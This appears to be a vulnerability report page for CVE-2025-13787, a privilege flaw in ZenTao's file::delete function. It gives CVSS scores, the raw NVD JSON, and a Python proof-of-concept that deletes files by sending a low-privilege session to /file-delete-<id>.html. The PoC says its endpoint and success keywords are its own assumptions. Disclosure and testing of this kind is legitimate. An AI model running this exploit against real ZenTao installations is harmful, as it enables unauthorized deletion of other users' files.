Security Vulnerability Report
CVE-2025-13787 CVSS 5.4 MEDIUM

CVE-2025-13787

Published: 2025-11-30 11:15:49
Last Modified: 2025-12-04 16:44:07

Description

A flaw has been found in ZenTao up to 21.7.6-8564. The affected element is the function file::delete of the file module/file/control.php of the component File Handler. Executing manipulation of the argument fileID can lead to improper privilege management. It is possible to launch the attack remotely. Upgrading to version 21.7.7 is sufficient to fix this issue. You should upgrade the affected component.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
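CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Note: the score and vector shown here are the CVSS 3.1 entry marked "Secondary" in the raw JSON below. The same record also carries a "Primary" CVSS 3.1 entry of 9.1 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H), which assumes no privileges are required and high integrity and availability impact. Check both assessments when prioritising the upgrade.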

Configurations (Affected Products)

cpe:2.3:a:zentao:zentao:*:*:*:*:*:*:*:* - VULNERABLE
ZenTao <= 21.7.6-8564

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
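import requests
import sys

# CVE-2025-13787 PoC - ZenTao Improper Privilege Management in file::delete
# Target: ZenTao <= 21.7.6-8564
# Remediation stated in the advisory: upgrade to ZenTao 21.7.7.
#
# NOTE(review): the advisory text on this page names only the affected
# function (file::delete in module/file/control.php) and the argument
# (fileID). The URL pattern and the response keywords used below are this
# PoC's own assumptions and are not confirmed by the advisory.
#
# Detection: the check is a single authenticated GET whose path contains
# "file-delete-<id>", so it is visible in the web server access log. Requests
# of that shape from accounts that do not own the referenced file are the
# signal to review on unpatched instances.


def exploit_file_deletion(base_url, session_cookie, target_file_id):
    """
    Send one file::delete request and classify the response.

    The request is issued with the session of a low-privilege user; the
    advisory describes the flaw as improper privilege management reachable
    through the fileID argument.

    Parameters:
    - base_url: ZenTao installation URL, without a trailing slash
    - session_cookie: value sent verbatim as the Cookie header
    - target_file_id: file ID placed in the request path

    Returns:
    - True:  HTTP 200 and the body contains "success" or "deleted"
             (case-insensitive substring match)
    - None:  HTTP 200 without either keyword (inconclusive)
    - False: any other status code, or a requests transport error

    A True result is only a keyword match on the response body. It is not
    proof that the file record was removed; confirm by checking whether the
    record still exists on the instance under test.
    """
    # Target endpoint for file deletion
    endpoint = f"{base_url}/file-delete-{target_file_id}.html"

    # Alternative endpoint format
    # endpoint = f"{base_url}/file-delete?fileID={target_file_id}"

    headers = {
        'Cookie': session_cookie,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Referer': f"{base_url}/file-browse-"
    }

    try:
        # State-changing action sent as a plain GET, bounded by a 10 s timeout.
        response = requests.get(endpoint, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

    if response.status_code != 200:
        print(f"[*] Response status: {response.status_code}")
        return False

    # Heuristic only: either word can appear on unrelated pages (for example
    # a login or error page rendered with status 200).
    body = response.text.lower()
    if 'success' in body or 'deleted' in body:
        print(f"[!] File {target_file_id} deleted successfully!")
        return True

    print("[*] Request sent, file may or may not be deleted")
    return None


def main():
    """Parse <base_url> <session_cookie> <file_id> from argv and report the outcome."""
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-13787.py <base_url> <session_cookie> <file_id>")
        print("Example: python cve-2025-13787.py http://target.com 'zentaosid=abc123' 999")
        sys.exit(1)

    base_url = sys.argv[1].rstrip('/')
    session_cookie = sys.argv[2]
    file_id = sys.argv[3]

    print(f"[*] Targeting: {base_url}")
    print("[*] Exploiting CVE-2025-13787 - ZenTao Improper Privilege Management")

    result = exploit_file_deletion(base_url, session_cookie, file_id)

    if result:
        print("[+] Vulnerability confirmed!")
    elif result is None:
        # The original reported the inconclusive case as a failure, which
        # contradicted the "may or may not be deleted" message printed above.
        print("[?] Inconclusive: HTTP 200 without a success indicator; verify the file state manually")
    else:
        print("[-] Exploitation failed or target not vulnerable")


if __name__ == "__main__":
    main()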

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13787", "sourceIdentifier": "[email protected]", "published": "2025-11-30T11:15:48.567", "lastModified": "2025-12-04T16:44:07.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in ZenTao up to 21.7.6-8564. The affected element is the function file::delete of the file module/file/control.php of the component File Handler. Executing manipulation of the argument fileID can lead to improper privilege management. It is possible to launch the attack remotely. Upgrading to version 21.7.7 is sufficient to fix this issue. You should upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 5.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:zentao:zentao:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.7.7", "matchCriteriaId": "725BA33D-560F-40A8-A4F0-605DF48E9A53"}]}]}], "references": [{"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/1#issuecomment-3540423868", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333791", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333791", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.689892", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zentao.net/extension-buyext-1601-download.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/1", "source": "134c7 ... (truncated)